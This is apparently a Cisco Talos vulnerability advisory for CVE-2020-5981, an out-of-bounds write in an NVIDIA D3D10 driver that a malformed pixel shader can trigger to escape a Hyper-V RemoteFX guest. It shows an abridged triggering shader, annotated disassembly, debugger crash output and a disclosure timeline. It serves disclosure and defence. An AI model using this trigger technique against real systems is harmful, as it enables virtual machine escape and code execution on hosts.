Talos Vulnerability Report

TALOS-2020-1036

NVIDIA D3D10 driver nvwgf2umx_cfg.dll nvwg MOV2 code execution vulnerability

August 30, 2020
CVE Number

CVE‑2020‑5981

Summary

An exploitable code execution vulnerability exists in the nvwg MOV2 functionality of NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250. A specially crafted shader can cause remote code execution. An attacker can use this vulnerability to perform a guest-to-host escape (through Hyper-V RemoteFX).

Tested Versions

NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250

Product URLs

https://nvidia.com

CVSSv3 Score

8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-787 - Out-of-bounds Write

Details

The NVIDIA graphics driver is the software for NVIDIA GPUs installed in a PC. It mediates communication between the operating system and the GPU device, and in most cases the hardware cannot function properly without it.

This vulnerability can be triggered by supplying a malformed pixel shader. This leads to memory corruption in the NVIDIA driver DLL, which is mapped into the application that uses it (for example, the Hyper-V RemoteFX process rdvgm.exe).

An example of a pixel shader triggering the bug:

ps_4_0
dcl_constantbuffer cb0[4], immediateIndexed
dcl_immediateConstantBuffer 
dcl_input_ps_siv constant v0.xyzw, position
dcl_output o0.xyzw
dcl_temps 9
mov r8.xyz, v0.xyzw
...
sincos r5.x, null, r3.xxxx
mov r3.x, r5.xxxx
mul r3.x, r1.yyyy, r3.xxxx
mul r3.x, r3.xxxx, l(400.000000, 400.000000, 400.000000, 400.000000)
sincos r5.x, null, r3.xxxx
mov r765657091.x, r5.
...

By modifying the destination register operand of the mov instruction, an attacker is able to trigger a memory corruption vulnerability in the NVIDIA graphics driver. The attacker can partially control the destination address by modifying the shader's bytecode.

...
00007FFB907A301F | 48 C1 E1 06              | shl rcx,6                               |
00007FFB907A3023 | C1 FE 08                 | sar esi,8                               |	* attacker can control ESI register
00007FFB907A3026 | 8B D6                    | mov edx,esi                             |
00007FFB907A3028 | 48 C1 E2 06              | shl rdx,6                               |
00007FFB907A302C | 42 0F 10 04 31           | movups xmm0,xmmword ptr ds:[rcx+r14]    |
00007FFB907A3031 | 49 03 D6                 | add rdx,r14                             |

...
00007FFB907A3070 | 0F 11 02                 | movups xmmword ptr ds:[rdx],xmm0        |



0:110> r
rax=0000000000000000 rbx=000002020356cf60 rcx=0000000000000380
rdx=00000241ec5a1360 rsi=00000000ffa3000c rdi=00000000000412c0
rip=00007ffb9e2bcf90 rsp=000000541b49ec60 rbp=000000541b49ed60
 r8=0000000000070000  r9=0000000000000001 r10=0000000000000000
r11=0000000000000001 r12=000000000000ff5f r13=0000000000000000
r14=00000202039a1060 r15=00000202032ab300
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x179b40:
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0 ds:00000241`ec5a1360=????????????????????????????????

stack trace:

0:110> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffb`9e159456 : 00000202`035da140 00000202`03035620 00000202`031a93c0 00000202`03723cd0 : nvwgf2umx_cfg!OpenAdapter12+0x179b40
01 00007ffb`9e15a232 : 00000000`00000000 00000202`03723cd0 00000000`00000000 00000202`037b8a80 : nvwgf2umx_cfg!OpenAdapter12+0x16006
02 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000054`1b49f1a0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
03 00007ffb`9e3f978d : 00000202`032ab590 00000202`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
04 00007ffb`9e46a84d : 00000202`031759a0 00000000`fffffff1 00000000`fffffff1 00000000`fffffff1 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
05 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000202`76b634c0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
06 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
07 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

Crash Information

!analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


KEY_VALUES_STRING: 1

	Key  : AV.Fault
	Value: Write

	Key  : Timeline.OS.Boot.DeltaSec
	Value: 24440

	Key  : Timeline.Process.Start.DeltaSec
	Value: 2162


PROCESSES_ANALYSIS: 1

SERVICE_ANALYSIS: 1

STACKHASH_ANALYSIS: 1

TIMELINE_ANALYSIS: 1

Timeline: !analyze.Start
	Name: <blank>
	Time: 2020-03-16T17:31:33.690Z
	Diff: 690 mSec

Timeline: Dump.Current
	Name: <blank>
	Time: 2020-03-16T17:31:33.0Z
	Diff: 0 mSec

Timeline: Process.Start
	Name: <blank>
	Time: 2020-03-16T16:55:31.0Z
	Diff: 2162000 mSec

Timeline: OS.Boot
	Name: <blank>
	Time: 2020-03-16T10:44:13.0Z
	Diff: 24440000 mSec


DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
nvwgf2umx_cfg!OpenAdapter12+179b40
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffb9e2bcf90 (nvwgf2umx_cfg!OpenAdapter12+0x0000000000179b40)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 00000241ec5a1360
Attempt to write to address 00000241ec5a1360

FAULTING_THREAD:  00000ba8

PROCESS_NAME:  rdvgm.exe

FOLLOWUP_IP: 
nvwgf2umx_cfg!OpenAdapter12+179b40
00007ffb`9e2bcf90 0f1102          movups  xmmword ptr [rdx],xmm0

WRITE_ADDRESS:  00000241ec5a1360 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  00000241ec5a1360

WATSON_BKT_PROCSTAMP:  c2ed11f1

WATSON_BKT_PROCVER:  10.0.18362.693

PROCESS_VER_PRODUCT:  Microsoft® Windows® Operating System

WATSON_BKT_MODULE:  nvwgf2umx_cfg.dll

WATSON_BKT_MODSTAMP:  5e543369

WATSON_BKT_MODOFFSET:  30cf90

WATSON_BKT_MODVER:  26.21.14.4250

MODULE_VER_PRODUCT:  NVIDIA D3D10 drivers

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

MODLIST_WITH_TSCHKSUM_HASH:  633b95c9e05d81568106c5eb6d754c627031543d

MODLIST_SHA1_HASH:  87cb7fbfa77a2f9cc0c73fea9f9a68d4ae0be36e

NTGLOBALFLAG:  400

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  272

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  CLAB

ANALYSIS_SESSION_TIME:  03-16-2020 18:31:33.0690

ANALYSIS_VERSION: 10.0.18362.1 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  PLK

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

PROBLEM_CLASSES: 

	ID:     [0n313]
	Type:   [@ACCESS_VIOLATION]
	Class:  Addendum
	Scope:  BUCKET_ID
	Name:   Omit
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

	ID:     [0n286]
	Type:   [INVALID_POINTER_WRITE]
	Class:  Primary
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [Unspecified]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

	ID:     [0n117]
	Type:   [EXPLOITABLE]
	Class:  Addendum
	Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
			BUCKET_ID
	Name:   Add
	Data:   Omit
	PID:    [0x440]
	TID:    [0xba8]
	Frame:  [0] : nvwgf2umx_cfg!OpenAdapter12

LAST_CONTROL_TRANSFER:  from 00007ffb9e159456 to 00007ffb9e2bcf90

STACK_TEXT:  
00000054`1b49ec60 00007ffb`9e159456 : 00000202`035da140 00000202`03035620 00000202`031a93c0 00000202`03723cd0 : nvwgf2umx_cfg!OpenAdapter12+0x179b40
00000054`1b49ee10 00007ffb`9e15a232 : 00000000`00000000 00000202`03723cd0 00000000`00000000 00000202`037b8a80 : nvwgf2umx_cfg!OpenAdapter12+0x16006
00000054`1b49efa0 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000054`1b49f1a0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
00000054`1b49f0a0 00007ffb`9e3f978d : 00000202`032ab590 00000202`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
00000054`1b49fb30 00007ffb`9e46a84d : 00000202`031759a0 00000000`fffffff1 00000000`fffffff1 00000000`fffffff1 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
00000054`1b49fc20 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000202`76b634c0 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
00000054`1b49fc70 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
00000054`1b49fca0 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000054`1b49fcd0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


THREAD_SHA1_HASH_MOD_FUNC:  cf11ca47cd244828b4bd54f41d1a85654a927900

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  33ebce64065a7eab7e4ea78fdccda28a11a5bae1

THREAD_SHA1_HASH_MOD:  701c05ef09dbf52b13a73d3e2d555e4906a8342a

FAULT_INSTR_CODE:  4102110f

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  nvwgf2umx_cfg!OpenAdapter12+179b40

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: nvwgf2umx_cfg

IMAGE_NAME:  nvwgf2umx_cfg.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  5e543369

STACK_COMMAND:  ~110s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_EXPLOITABLE_c0000005_nvwgf2umx_cfg.dll!OpenAdapter12

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_nvwgf2umx_cfg!OpenAdapter12+179b40

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  nvwgf2umx_cfg.dll

BUCKET_ID_IMAGE_STR:  nvwgf2umx_cfg.dll

FAILURE_MODULE_NAME:  nvwgf2umx_cfg

BUCKET_ID_MODULE_STR:  nvwgf2umx_cfg

FAILURE_FUNCTION_NAME:  OpenAdapter12

BUCKET_ID_FUNCTION_STR:  OpenAdapter12

BUCKET_ID_OFFSET:  179b40

BUCKET_ID_MODPRIVATE: 1

BUCKET_ID_MODTIMEDATESTAMP:  5e543369

BUCKET_ID_MODCHECKSUM:  272ca91

BUCKET_ID_MODVER_STR:  26.21.14.4250

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  nvwgf2umx_cfg.dll!OpenAdapter12

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/rdvgm.exe/10.0.18362.693/c2ed11f1/nvwgf2umx_cfg.dll/26.21.14.4250/5e543369/c0000005/0030cf90.htm?Retriage=1

TARGET_TIME:  2020-03-16T17:31:37.000Z

OSBUILD:  18363

OSSERVICEPACK:  329

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  190318-1202

BUILDLAB_STR:  19h1_release

BUILDOSVER_STR:  10.0.18362.1.amd64fre.19h1_release.190318-1202

ANALYSIS_SESSION_ELAPSED_TIME:  10bb

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_exploitable_c0000005_nvwgf2umx_cfg.dll!openadapter12

FAILURE_ID_HASH:  {32968bfd-cb9d-86c1-30b8-ad1954eb9190}

Followup:     MachineOwner
---------

Timeline

2020-03-25 - Vendor Disclosure
2020-04-06 - Vendor requested disclosure extension; Talos granted extension
2020-08-25 - Discussion w/vendor regarding CVE assignment
2020-09-30 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.